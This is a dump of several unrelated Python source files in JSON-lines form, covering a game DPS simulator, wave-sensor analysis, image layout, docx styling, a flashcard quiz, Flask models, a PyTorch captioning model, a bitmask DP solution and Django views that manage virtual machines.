cast('multi_shot',gcdVal/casting_haste,mana_cost,9,0.5/casting_haste,True)\n increment_rotation()\n #arcane shot\n if rotations[rotation][rotation_index] == 'as':\n if mana >= 230:\n mana_cost = 230\n while cooldowns['arcane_shot'] > 0:\n pass_time()\n as_cd = (6-talents.iarcane_shot * 0.2) if talents.iarcane_shot!=0 else 6\n cast('arcane_shot',gcdVal,mana_cost,as_cd,0,True)\n increment_rotation()\n\n pass_time()\n dps = damage/maxtime\n eweakness_uptime = expose_weakness_uptime/maxtime\n expose_weakness_dps = calculate_expose_weakness_dps() * eweakness_uptime\n \"\"\"print(str(dps) + ' dps')\n print(str(round(eweakness_uptime*100,2)) + \"% expose weakness uptime\")\n print(str(round(expose_weakness_dps,2)) + ' bonus expose weakness dps')\n print('total dps:', round(dps+expose_weakness_dps,2))\n print('fight length', maxtime//60, 'minutes')\n print('simulation runtime', str(round((time.time()-start)/60,1)) + ' minutes')\"\"\"\n iterations_damage.append(dps)\n expose_weakness_uptime_list.append(eweakness_uptime)\n expose_weakness_dps_list.append(expose_weakness_dps)\n madness_uptime_list.append(madness_uptime)\n damage=0\n expose_weakness_uptime=0\n madness_uptime=0\n#while (time.time() - start) < 60:\nwhile iteration_counter < iterations:\n main()\nprint(round(sorted(iterations_damage)[len(iterations_damage)//2],2),'dps')\nprint(str(round(sorted(expose_weakness_uptime_list)[len(expose_weakness_uptime_list)//2]*100,2)) + \"% expose weakness uptime\")\nprint(round(sorted(expose_weakness_dps_list)[len(expose_weakness_dps_list)//2],2),'bonus expose weakness dps')\nprint('total dps:',round(round(sorted(iterations_damage)[len(iterations_damage)//2],2) + round(sorted(expose_weakness_dps_list)[len(expose_weakness_dps_list)//2],2)))\nprint(round((time.time()-start)/60,1),'minutes')\nprint('madness',madness_uptime_list[len(madness_uptime_list)//2])\n","sub_path":"Hunter/Hunter.py","file_name":"Hunter.py","file_ext":"py","file_size_in_byte":39491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309953296","text":"import input_reader\nimport transform_data\nimport filters\nimport statistics\nimport plotting\nfrom orientation import Orientation\nfrom low_pass_filter import smooth\n\n\nclass Wave:\n def __init__(self, file_name):\n # parameters:\n self.average_gravity = 9.815\n self.ex_size_vel = 40 # default value, range: 20-100\n self.ex_size_rel = 0.5\n self.det_prec_vel = 0.9\n self.det_prec_rel = 1.0\n self.ex_size_dis = int(self.ex_size_vel * self.ex_size_rel)\n self.det_prec_dis = self.det_prec_vel * self.det_prec_rel\n self.mean_acc_weight = 0.05\n self.mean_vel_weight = 0.03 # default value, range: 0.01 - 0.05\n self.period_est_weight = 0.005\n # correct avg height x to corrected avg height y, with y = a*x + b, where:\n # [a, b] below.\n a = [1.0253, 0.0141]\n b = [0.965, -0.016]\n self.height_correct_factors = b\n\n # variables:\n self.file_name = file_name\n self.est_average_period = 0.0\n self.average_wave_height = 0.0\n self.average_wave_period = 0.0\n self.acc_std_dev = 0.0\n self.avg_cor_wave_height = 0.0\n self.time = []\n self.acc_readings = []\n self.anti_drift_acc_readings = []\n self.filtered_acc_readings = []\n self.distances = []\n self.velocities = []\n self.drift_corrected_velocity = []\n self.drift_corrected_distance = []\n self.height_corrected_distance = []\n self.filtered_velocity = []\n self.vel_crests = []\n self.vel_troughs = []\n self.pos_crests = []\n self.pos_troughs = []\n\n # running the program\n 
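#[editor's note] the pipeline below runs in place on this instance: orient the raw accelerometer readings, remove drift and smooth them, integrate acceleration -> velocity -> displacement (drift-correcting after each integration), then derive wave height/period statistics and apply the height correction. A hedged sketch of the integration step, assuming the trapezoidal rule (hypothetical helper, not the project's transform_data.integrate):\n        #def integrate(t, y):\n        #    out = [0.0]\n        #    for k in range(1, len(y)):\n        #        out.append(out[-1] + 0.5 * (y[k] + y[k - 1]) * (t[k] - t[k - 1]))\n        #    return out\n        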
#input_reader.read_acc_data(self)\n\n        ori = Orientation(self)\n        ori.set_z_madg(self)\n\n        self.acc_std_dev = statistics.get_std_dev(self.acc_readings)  # for analysis of the algorithm\n\n        filters.anti_drift_filter(self.time, self.acc_readings, self.anti_drift_acc_readings)\n\n        statistics.estimate_period(self, True)\n\n        filters.filter_readings(self.anti_drift_acc_readings, self.filtered_acc_readings, self.mean_acc_weight)\n\n        #self.filtered_acc_readings = smooth(self.anti_drift_acc_readings)\n\n        transform_data.integrate(self.time, self.filtered_acc_readings, self.velocities)\n        filters.filter_readings(self.velocities, self.filtered_velocity, self.mean_vel_weight)\n        transform_data.drift_correct(self.filtered_velocity, self.drift_corrected_velocity, self.ex_size_vel,\n                                     self.det_prec_vel, self.vel_crests, self.vel_troughs)\n        transform_data.integrate(self.time, self.drift_corrected_velocity, self.distances)\n        transform_data.drift_correct(self.distances, self.drift_corrected_distance, self.ex_size_dis,\n                                     self.det_prec_dis, self.pos_crests, self.pos_troughs)\n\n        statistics.get_wave_data(self, False)\n\n        transform_data.height_correct(self)\n\n        statistics.get_wave_data(self, True)\n\n","sub_path":"wave_data_analyser/wave_data_analyser.py","file_name":"wave_data_analyser.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"74727411","text":"def four_up_writer(image_list, title='Untitled', output_filename='images4up'):\n    ''' take a list of images, and lay them out in a four-up configuration '''\n\n    def res_img(image, new_width, new_height):\n        ''' resize an image '''\n        #resizing images to fit in the bins.\n        #https://stackoverflow.com/questions/273946/how-do-i-resize-an-image-using-pil-and-maintain-its-aspect-ratio\n        #img = img.resize((basewidth,hsize), PIL.Image.ANTIALIAS)\n\n        from PIL import Image\n        return image.resize((int(new_width), int(new_height)), Image.ANTIALIAS)  # resize() expects integer pixel sizes; the cell dimensions can be floats\n\n    import datetime as dt\n    import numpy as np\n    from PIL import Image, ImageDraw\n    from pic_canvas import pic_canvas\n\n    #glob.glob('*.png')\n    # ['HAI CAUTI.png', 'HAI CLABSI.png', 'HAI VAE.png', 'HAI MRSA.png']\n    #image_pieces = ['piv1.png','piv2.png','piv3.png']\n\n    # make a blank to fit in an open space\n    blank = Image.new('RGB', (5, 5), (255, 255, 255))\n\n    # open all of the images into a list\n    images = map(Image.open, image_list)\n\n    dpi = 300\n\n    total_size = int(11*dpi)\n\n    total_height = int(8.5*dpi)\n\n    W = total_size\n\n    H = total_height\n\n    h = 140\n\n    f = h\n\n    h1 = (H - h - f) / 2\n\n    import itertools\n    #A8 = min(h1, W/4)\n    #A8seeds = [(int(x),int(y)) for x,y in itertools.product( W*np.linspace(0, 1, num=4, endpoint=False),(h,h1) ) ]\n\n    A4_h = min(h1, W/2)\n    A4_w = max(h1, W/2)\n\n    A4seeds = [(int(x),int(y)) for x,y in itertools.product( W*np.linspace(0, 1, num=2, endpoint=False),(h,h + h1 + 1) ) ]\n\n    # make a blank canvas\n    #new_im = Image.new('RGB', (total_size,total_height), (255, 255, 255))\n    new_im = pic_canvas(title)\n\n    #resize all the images to fit\n    images = [res_img(i, A4_w, A4_h) for i in images]\n\n    for i,j in enumerate(A4seeds):\n        try:\n            hold = images[i]\n        except IndexError:\n            # fewer than four images supplied; fill the empty cell with the blank\n            hold = blank\n        new_im.paste(hold, j)\n\n    draw = ImageDraw.Draw(new_im)\n\n    # horizontal divider line\n    draw.line((0, H/2, W, H/2), fill=(0,0,0), width=2)\n\n    # A4 vertical divider line\n    draw.line((W/2, h, W/2, H - f), fill=(0,0,0), width=2)\n\n    new_im.save(output_filename+'.png')\n    
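#[editor's note] layout recap: A4seeds above holds the top-left corner of each of the four cells, i.e. the Cartesian product of two column offsets (x = 0 and W/2) and two row offsets (y = h and h + h1 + 1); each image is resized to the cell size (A4_w x A4_h) before being pasted. A hedged usage sketch (hypothetical file names):\n    #four_up_writer(['a.png', 'b.png', 'c.png', 'd.png'],\n    #               title='Quarterly charts', output_filename='report4up')\n    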
new_im.save(output_filename+'.pdf')","sub_path":"QMTools/four_up/four_up_writer.py","file_name":"four_up_writer.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"645634404","text":"\"\"\"\nDefault style\n\"\"\"\nfrom contextlib import contextmanager\nfrom docx.shared import Pt, Mm\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH, WD_LINE_SPACING\n\nvalue_of = contextmanager(lambda v: (yield v))\n\nclass Style:\n \"\"\"Default style class\"\"\"\n @classmethod\n def apply(cls, doc):\n \"\"\"Apply style do document\"\"\"\n with value_of(doc.sections[0]) as section:\n # Page size A4\n section.page_height = Mm(297)\n section.page_width = Mm(210)\n\n # Margins\n section.top_margin = Pt(60)\n section.bottom_margin = Pt(60)\n section.left_margin = Pt(60)\n section.right_margin = Pt(60)\n\n # Normal\n with value_of(doc.styles['Normal']) as normal:\n normal.font.name = 'Calibri Light'\n normal.font.size = Pt(10)\n normal.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.JUSTIFY\n normal.paragraph_format.line_spacing_rule = WD_LINE_SPACING.SINGLE\n normal.paragraph_format.space_after = Pt(10)\n\n # Quote\n with value_of(doc.styles['Quote']) as quote:\n quote.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.LEFT\n\n for heading_level in range(1, 4): # 1..3\n with value_of(doc.styles[f'Heading {heading_level}']) as heading:\n heading.font.color.rgb = None\n heading.font.name = 'Calibri'\n heading.font.size = Pt(10 + 2 * (3 - heading_level))\n heading.font.bold = True\n heading.font.small_caps = True\n heading.paragraph_format.space_before = None\n","sub_path":"md2docx/styles/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"178717443","text":"# flashcards.py\n\n# import the json module from python3\nimport json\n\n# open the file and parse the json\nwith open('me-capitals.json', 'r') as f:\n data = json.load(f)\n\n# initialize total as the length of the cards array\ntotal = len(data[\"cards\"])\n# initialize score as 0\nscore = 0\n\nwhile score == 0:\n score = 0\n\n for i in data[\"cards\"]:\n guess = input(i[\"q\"] + \" > \")\n # print(guess)\n\n if guess.lower() == i['a'].lower():\n # increment score up one\n score += 1\n # interpolate score and total into the response\n print(f\"Correct! Current score: {score}/{total}\")\n else:\n print(\"Incorrect! The correct answer was\", i[\"a\"])\n print(f\"Current score: {score}/{total}\")\n\n play_again = input(\"Would you like to play again? 
(yes/no) > \")\n if play_again == 'yes':\n score = 0\n total = len(data[\"cards\"])\n else:\n break\n","sub_path":"flashcards.py","file_name":"flashcards.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"587734344","text":"from app import db\r\n\r\n# pen tag joining table\r\nPenTag = db.Table('PenTag', db.Model.metadata,\r\ndb.Column('pid', db.Integer, db.ForeignKey('Pen.id')),\r\ndb.Column('tid', db.Integer, db.ForeignKey('Tag.id'))\r\n)\r\n\r\n\r\n# brands\r\nclass Brand(db.Model):\r\n __tablename__ = 'Brand'\r\n\r\n id = db.Column(db.Integer, primary_key = True)\r\n name = db.Column(db.String, nullable = False)\r\n desc = db.Column(db.Text)\r\n photo = db.Column(db.Text)\r\n deletable = db.Column(db.Boolean)\r\n pens = db.relationship('Pen', backref='brand')\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\n# credits to information or images used in the website\r\nclass Credit(db.Model):\r\n __tablename__ = \"Credit\"\r\n\r\n id = db.Column(db.Integer, primary_key = True)\r\n name = db.Column(db.String, nullable = False)\r\n link = db.Column(db.Text, nullable = False)\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\n# pens\r\nclass Pen(db.Model):\r\n __tablename__ = \"Pen\"\r\n\r\n id = db.Column(db.Integer, primary_key = True)\r\n name = db.Column(db.String, nullable = False)\r\n desc = db.Column(db.Text)\r\n photo = db.Column(db.Text)\r\n bid = db.Column(db.Integer,db.ForeignKey('Brand.id'), nullable = False)\r\n tags = db.relationship('Tag', secondary=PenTag, back_populates='pens')\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\n# tags\r\nclass Tag(db.Model):\r\n __tablename__ = \"Tag\"\r\n\r\n id = db.Column(db.Integer, primary_key = True)\r\n name = db.Column(db.String, nullable = False)\r\n desc = db.Column(db.Text)\r\n photo = db.Column(db.Text)\r\n pens = db.relationship('Pen', secondary=PenTag, back_populates='tags')\r\n\r\n def __str__(self):\r\n return self.name","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"469141359","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\nimport torch.nn.functional as F\nimport numpy as np\n\ntrain_on_gpu = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass EncoderCNN(nn.Module):\n def __init__(self, embed_size):\n super(EncoderCNN, self).__init__()\n resnet = models.resnet50(pretrained=True)\n for param in resnet.parameters():\n param.requires_grad_(False)\n\n modules = list(resnet.children())[:-1]\n self.resnet = nn.Sequential(*modules)\n self.embed = nn.Linear(resnet.fc.in_features, embed_size)\n\n def forward(self, images):\n features = self.resnet(images)\n features = features.view(features.size(0), -1)\n features = self.embed(features)\n return features\n\n def get_learnable_parameters(self, ):\n return [param for name, param in self.named_parameters() if name.startswith('embed')]\n\n\nclass DecoderRNN(nn.Module):\n def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1, dropout=0):\n super(DecoderRNN, self).__init__()\n self.embed_size = embed_size\n self.hidden_size = hidden_size\n self.vocab_size = vocab_size\n self.num_layers = num_layers\n\n # define model layers\n self.embed = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embed_size)\n self.lstm = 
nn.LSTM(input_size=embed_size, hidden_size=hidden_size, num_layers=num_layers, dropout=dropout,\n batch_first=True)\n self.fc = nn.Linear(in_features=hidden_size, out_features=vocab_size)\n\n def forward(self, features, captions):\n # batch size\n batch_size = features.size(0)\n\n hidden_state, cell_state = self.init_hidden(batch_size, features)\n\n # define the output tensor placeholder\n outputs = torch.zeros((batch_size, captions.size(1), self.vocab_size)).to(device)\n\n # embed the captions\n captions_embed = self.embed(captions)\n\n # pass the caption word by word\n for t in range(captions.size(1) - 1):\n out, (hidden_state, cell_state) = self.lstm(captions_embed[:, t, :].view(batch_size, 1, -1),\n (hidden_state, cell_state))\n out = out.contiguous().view(-1, self.hidden_size)\n out = self.fc(out)\n # build the output tensor\n outputs[:, t + 1, :] = out\n\n return outputs\n\n def sample(self, inputs, states=None, max_len=20, top_k=5):\n \" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) \"\n\n batch_size = inputs.size(0)\n # list of word indices\n word_idxs = torch.zeros((batch_size, max_len)).type(torch.LongTensor)\n outputs = torch.zeros((batch_size, max_len, self.vocab_size)).to(device)\n\n def sample_word_from_fc_out(fc_out):\n p = F.softmax(fc_out, dim=1).data\n p, top_ch = p.topk(top_k)\n word_idxs_for_batch = torch.zeros(batch_size, dtype=torch.long)\n for i in range(top_ch.size(0)):\n top_ch_i = top_ch[i].cpu().numpy().squeeze()\n # select the likely next character with some element of randomness\n p_i = p[i].cpu().numpy().squeeze()\n word_idx = np.random.choice(top_ch_i, p=p_i / p_i.sum())\n word_idxs_for_batch[i] = int(word_idx)\n return word_idxs_for_batch\n\n hidden_state, cell_state = self.init_hidden(batch_size, inputs)\n\n word_idx_for_batch = torch.zeros((batch_size, 1), dtype=torch.long).to(device)\n for i in range(max_len - 1):\n embedding = self.embed(word_idx_for_batch.to(device))\n lstm_out, (hidden_state, cell_state) = self.lstm(embedding.view(batch_size, 1, -1),\n (hidden_state, cell_state))\n lstm_out = lstm_out.contiguous().view(-1, self.hidden_size)\n fc_out = self.fc(lstm_out)\n outputs[:, i, :] = fc_out\n word_idx_for_batch = sample_word_from_fc_out(fc_out)\n word_idxs[:, i] = word_idx_for_batch\n\n return word_idxs, outputs\n\n def init_hidden(self, batch_size, features):\n '''\n Initialize the hidden state of an LSTM/GRU\n :param batch_size: The batch_size of the hidden state\n :return: hidden state of dims (n_layers, batch_size, hidden_dim)\n '''\n # Implement function\n\n # initialize hidden state with zero weights, and move to GPU if available\n\n # Create two new tensors with sizes n_layers x batch_size x n_hidden,\n # initialized to zero, for hidden state and cell state of LSTM\n weight = next(self.parameters()).data\n\n if (train_on_gpu):\n hidden_state, cell_state = (weight.new(self.num_layers, batch_size, self.hidden_size).zero_().cuda(),\n weight.new(self.num_layers, batch_size, self.hidden_size).zero_().cuda())\n else:\n hidden_state, cell_state = (weight.new(self.num_layers, batch_size, self.hidden_size).zero_(),\n weight.new(self.num_layers, batch_size, self.hidden_size).zero_())\n\n # initialized the first hidden layer with the extracted features from the CNN\n hidden_state[0, :, :] = features.view(1, batch_size, self.hidden_size)\n cell_state[0, :, :] = features.view(1, batch_size, self.hidden_size)\n return hidden_state, 
cell_state\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"56578643","text":"N, M = map(int, input().split())\n\nparts = []\nfor _ in range(M):\n mask = 0\n s, c = input().split()\n for i, f in enumerate(s):\n if f == 'Y':\n mask |= (1 << i)\n parts.append((mask, int(c)))\n\nINF = 10**18\ndp = [INF] * (1 << N)\ndp[0] = 0\nfor state in range(1 << N):\n for mask, c in parts:\n if dp[state | mask] > dp[state] + c:\n dp[state | mask] = dp[state] + c\n\nans = dp[(1 << N) - 1]\nprint(ans if ans < INF else -1)\n","sub_path":"AtCoder/other/PAST_1/i.py","file_name":"i.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"351154255","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom django.contrib.auth import logout\nfrom django.http import HttpResponseRedirect, JsonResponse\n\nimport uuid\nimport json\n\n# Access point to the middleware variables\nfrom ..middleware import *\nfrom ..models.models_virtual_resource import *\nfrom ..models.models_auth import *\nfrom ..exceptions import DeployException\nfrom ..decorators import *\n# from ..tests import *\n\n# Create your views here.\n# TODO When application start need to check all hosts from db to see if it is up\n# use get_hosts_list from server to compare\n\n\n# URL: /host_clients\n#\n@ensure_user_auth\ndef controller_hypersor_list(request):\n if request.user.is_authenticated: # authenticated\n\n # Hosts alive\n activeHypervisors = [hypervisor.clientMeta.currentHypervisor for hypervisor in middlware_server.getHypervisors()]\n hypervisors = HypervisorModel.objects.all()\n obj_return = []\n for host in hypervisors:\n vms = VirtualMachineModel.objects.filter(hostedOn=host)\n obj_return.append({'hypervisor': host,\n 'virtualMachines': vms})\n \n return render(request, 'app_bendis/hypervisors_list.html', {'activeHypervisors': activeHypervisors,\n 'hypervisors': hypervisors,\n 'obj_return': obj_return, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n# URL: /test_endpoint\n# TODO test_endpoint\ndef controller_test_endpoint(request):\n response_test = None # test_creating_vm()\n if not response_test:\n return JsonResponse({'has_error': 'false'})\n else:\n return JsonResponse({'has_error': 'true', 'msg': str(response_test)})\n\n\n# URL: /virtual_machines\n# Virtual Machines list\n@ensure_user_auth\ndef controller_virtual_machines(request):\n if request.user.is_authenticated:\n vms = VirtualMachineModel.objects.filter(owner=request.user)\n obj_return = []\n \n return render(request, 'app_bendis/vm_list.html', {'vms': vms, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n# URL: /search\n#\n@ensure_user_auth\ndef controller_search(request):\n if request.user.is_authenticated:\n return render(request, 'app_bendis/vm_list.html', {})\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n# URL: /create_virtual_machine\n#\n@ensure_user_auth\ndef controller_create_virtual_machine(request):\n if request.user.is_authenticated:\n userProfile = 
ProfileModel.objects.get(user=request.user)\n        if request.method == 'POST':\n\n            deploy_exception = DeployException()\n\n            if userProfile.userAppliance.role != 'admin':\n                vm_numbers = VirtualMachineModel.objects.filter(owner=request.user).count()\n                if userProfile.virtual_machine_allowed <= vm_numbers:\n                    deploy_exception.exceed_vm_number_not_admin = 'Your account has exceeded the amount of VMs allowed.'\n\n            vm_name = request.POST.get('vm_name', None)\n            vm_ram = request.POST.get('vm_ram', None)\n            vm_cpu = request.POST.get('vm_cpu', None)\n            vm_os = request.POST.get('vm_os', None)\n            vm_network_interface = request.POST.get('vm_network_interface', None)\n            vm_disk_size = request.POST.get('vm_disk_size', None)\n            vm_description = request.POST.get('vm_description', None)\n            availability_zone = request.POST.get('availability-zone', None)\n            vm_auto_start_deploy = request.POST.get('auto_start', None)\n\n            # TODO check resources on host\n            deploy_exception.check(availability_zone, vm_os, vm_name, vm_ram, vm_cpu, vm_network_interface, vm_description)\n\n            # only deploy if no validation error has been found\n            if not deploy_exception.has_error():\n                vmHardware = HardwareModel(hostname='', ram=str(int(vm_ram) * 1024), cpu=vm_cpu)\n                vmHardware.save()\n                vm = VirtualMachineModel(name=vm_name, status='creating',\n                                         hardware=vmHardware,\n                                         typeOS=vm_os, owner=request.user,\n                                         hostedOn=HypervisorModel.objects.first(),\n                                         description=vm_description,\n                                         uuid_internal=str(uuid.uuid4()))\n                vm.save()\n\n                if userProfile.userAppliance.account_feature == 'load_balancing':\n                    if vm_disk_size == '':\n                        score, best_host_ip = load_balancing.recommended_host(vm)\n                    else:\n                        score, best_host_ip = load_balancing.recommended_host(vm, int(vm_disk_size))\n                    if best_host_ip:\n                        hypervisorHardware = PhysicalHardwareModel.objects.filter(ipAddress=best_host_ip).first()\n                        best_host = HypervisorModel.objects.get(hardware=hypervisorHardware)\n                        vm.hostedOn = best_host\n                        vm.save()\n                    else:\n                        logging.debug(\"[Load Balancing] Load balancing allocation error ... replace with first host\")\n\n                else:\n                    hypervisorHardware = PhysicalHardwareModel.objects.filter(ipAddress=availability_zone).first()\n                    host_client = HypervisorModel.objects.filter(hardware=hypervisorHardware).first()\n                    vm.hostedOn = host_client\n                    vm.save()\n\n                # TODO Send command for creating VM with boot disk\n                middlware_server.Enqueue(vm.hostedOn, vm.create())\n                middlware_server.Enqueue(vm.hostedOn, vm.hardware_configuration())\n\n                if vm_disk_size == '':\n                    pass\n                else: # TODO Check if vm_disk_size is an integer\n                    cmd_attach_disk_data = vm.attach_disk_data(vm_disk_size + \"GB\")\n                    middlware_server.Enqueue(vm.hostedOn, vm.hardware.disksUsed.last().create())\n                    middlware_server.Enqueue(vm.hostedOn, cmd_attach_disk_data)\n\n                if vm_auto_start_deploy is not None:\n                    middlware_server.Enqueue(vm.hostedOn, vm.start_headless())\n                else:\n                    vm.start_after_created = False\n                    vm.save()\n\n                return HttpResponseRedirect('/') # Redirect after POST\n            else:\n                hosts = HypervisorModel.objects.all()\n                return render(request, 'app_bendis/vm_create.html',\n                              {'deploy_exception': str(deploy_exception),\n                               'hosts': hosts, })\n        elif request.method == 'GET':\n            # TODO filter to online hosts only; hosts marked 'running' may still have gone down since their last check-in\n            hosts = HypervisorModel.objects.filter(status='running')\n\n            return render(request, 'app_bendis/vm_create.html', {'hosts': hosts, 'profile_user': userProfile, })\n        else:\n            logout_status = 'You are not allowed!'\n            return render(request, 'auth/login.html', {'logout_status': logout_status})\n    else:\n        logout_status = 'You are not allowed!'\n        return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n# URL: /controller_cmd\n#\n@ensure_user_auth\ndef controller_control_vm(request, args):\n    if request.user.is_authenticated:\n\n        uuid_object = args[:36]\n        command = args[36:]\n        vm = VirtualMachineModel.objects.get(uuid_internal=uuid_object)\n        if vm is not None:\n            if vm.hostedOn.status == 'running' or vm.hostedOn.status == 'stop':\n                debug = ''\n                if vm.status != 'terminated':\n                    if command == 'start':\n                        middlware_server.Enqueue(vm.hostedOn, vm.start_headless())\n                        vm.status = 'running'\n                    elif command == 'shutdown':\n                        middlware_server.Enqueue(vm.hostedOn, vm.power_off())\n                        vm.status = 'stop'\n                    elif command == 'restart':\n                        middlware_server.Enqueue(vm.hostedOn, vm.restart())\n                        vm.status = 'running'\n                    elif command == 'terminate':\n                        if vm.status == 'running':\n                            middlware_server.Enqueue(vm.hostedOn, vm.power_off())\n                        middlware_server.Enqueue(vm.hostedOn, vm.destroy())\n                        vm.status = 'terminated'\n                    else:\n                        debug = 'Error controller_cmd: unknown command'\n                else:\n                    debug = 'virtual machine already terminated'\n                #persist the status change before rendering\n                vm.save()\n                vms = VirtualMachineModel.objects.filter(owner=request.user)\n                return render(request, 'app_bendis/vm_list.html', {'debug': debug, 'vms': vms, })\n            else:\n                debug = 'host where the vm is located is shut down or disconnected'\n                vms = VirtualMachineModel.objects.filter(owner=request.user)\n                return render(request, 'app_bendis/vm_list.html', {'debug': debug, 'vms': vms, })\n\n        return HttpResponseRedirect('/')\n    else:\n        logout_status = 'You are not allowed!'\n        return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n# URL: /storage\n#\n@ensure_user_auth\ndef controller_storage(request):\n    def get_views_disks():\n        disks_view = []\n        for vm in VirtualMachineModel.objects.all():\n            for disk in vm.hardware.disksUsed.all():\n                disk_view_elem = DiskView(vm_hosted_on=vm, disk=disk)\n                disks_view.append(disk_view_elem)\n        return disks_view\n\n    if 
request.user.is_authenticated:\n debug = ''\n disks_view = get_views_disks()\n\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'debug': debug, 'disks_view': disks_view, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n# URL: /create_storage\n#\n@ensure_user_auth\ndef controller_create_storage(request, vm_name):\n def get_views_disks():\n disks_view = []\n for vm in VirtualMachineModel.objects.all():\n for disk in vm.hardware.disksUsed.all():\n disk_view_elem = DiskView(vm_hosted_on=vm, disk=disk)\n disks_view.append(disk_view_elem)\n return disks_view\n \n if request.user.is_authenticated:\n if request.method == 'POST':\n vm_disk_size = request.POST.get('vm_disk_size', None)\n if vm_disk_size:\n try:\n disk_size = int(vm_disk_size)\n except:\n deploy_exception = \"disk size have to be an integer\"\n disks_view = get_views_disks()\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'deploy_exception': deploy_exception,\n 'disks_view': disks_view, })\n\n vm = VirtualMachineModel.objects.filter(name=vm_name).first()\n\n if vm:\n if vm.status == 'stop':\n cmd_attach_disk_data = vm.attach_disk_data(str(disk_size) + \"GB\")\n middlware_server.Enqueue(vm.hostedOn, vm.hardware.disksUsed.last().create())\n middlware_server.Enqueue(vm.hostedOn, cmd_attach_disk_data)\n else:\n deploy_exception = \"vm stopped\"\n disks_view = get_views_disks()\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'deploy_exception': deploy_exception,\n 'vm_name': vm_name,\n 'disks_view': disks_view, })\n else:\n deploy_exception = \"vm not selected or is not found\"\n disks_view = get_views_disks()\n\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'deploy_exception': deploy_exception,\n 'vm_name': vm_name,\n 'disks_view': disks_view, })\n disks_view = get_views_disks()\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'disks_view': disks_view, })\n else:\n deploy_exception = \"not select disk size\"\n disks_view = get_views_disks()\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'deploy_exception': deploy_exception,\n 'disks_view': disks_view, })\n\n else:\n return render(request, 'app_bendis/vm_storage_disk_create.html', {'vm_name': vm_name})\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n# URL: /network\n#\n@ensure_user_auth\ndef controller_vnat_network(request):\n if request.user.is_authenticated:\n debug = ''\n natNetworks = NatNetworkModel.objects.all()\n obj_return = []\n for natNetwork in natNetworks:\n vms = VirtualMachineModel.objects.filter(natNetworks__in=[natNetwork])\n obj_return.append({'natNetwork': natNetwork,\n 'virtualMachines': vms})\n return render(request, 'app_bendis/vm_vnet_network_list.html', {'debug': debug, 'natNetworks': natNetworks,\n 'obj_return': obj_return, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n# URL: /port_forword\n#\n@ensure_user_auth\ndef controller_create_vnat_network(request):\n if request.user.is_authenticated:\n\n if request.method == 'POST':\n vnet_name = request.POST.get('vnet_name', None)\n vnet_subnet = request.POST.get('vnet_subnet', None)\n vnet_lower_ip = request.POST.get('vnet_lower_ip', None)\n vnet_upper_ip = request.POST.get('vnet_upper_ip', None)\n vnet_netmask = request.POST.get('vnet_netmask', None)\n 
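#[editor's note] the form fields read here are consumed unvalidated further down, and vnet_netmask is never passed to NatNetworkModel. A minimal guard, assuming the same field names (sketch only, not the original view's behavior):\n            #if not all((vnet_name, vnet_subnet, vnet_lower_ip, vnet_upper_ip)):\n            #    return render(request, 'app_bendis/vm_vnet_network_create.html',\n            #                  {'debug': 'all network fields are required'})\n            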
